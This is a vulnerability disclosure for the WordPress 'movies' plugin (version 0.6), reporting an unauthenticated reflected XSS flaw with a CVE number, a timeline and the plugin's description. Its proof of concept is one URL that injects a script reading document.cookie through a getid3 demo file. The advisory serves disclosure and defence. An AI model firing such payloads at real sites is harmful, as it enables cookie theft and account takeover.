wp-plugin : movies

Plugin Details
Plugin Name: wp-plugin : movies
Effected Version : 0.6 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4539
Plugin Description :
[| Movies allows you to use simple functions in your theme to display videos you have attached to Posts/Pages/Custom Post Types in your Media Library. Your player is styled 100% with CSS/images (if you want). The video player uses the MediaElement (by default, or VideoJS - you pick!) library and your browser's native HTML5 capabilities when available with a fallback to Flash when necessary. Allows you to play video inline on mobile browsers that support HTML5 Video. Video metadata is written to the page using the hMedia micro-format for semantic markup. You can use this shortcode <code>[movies]</code> or <code>the_movies()</code> or <code>the_videos()</code> in your theme to output your item's attachments. You may need to add these Mime-Type declarations to <code>httpd.conf</code> or your <code>.htaccess</code> file <code> AddType video/ogg .ogv AddType video/mp4 .mp4 AddType video/webm .webm </code> Read More here: http://scottctaylor.wordpress.com/2010/11/24/new-plugin-movies/ Follow-up: http://scottctaylor.wordpress.com/2010/11/28/movies-plugin-now-supports-webm/ Latest: http://scottctaylor.wordpress.com/2010/12/07/movies-v0-4-now-with-mediaelement-support/ ]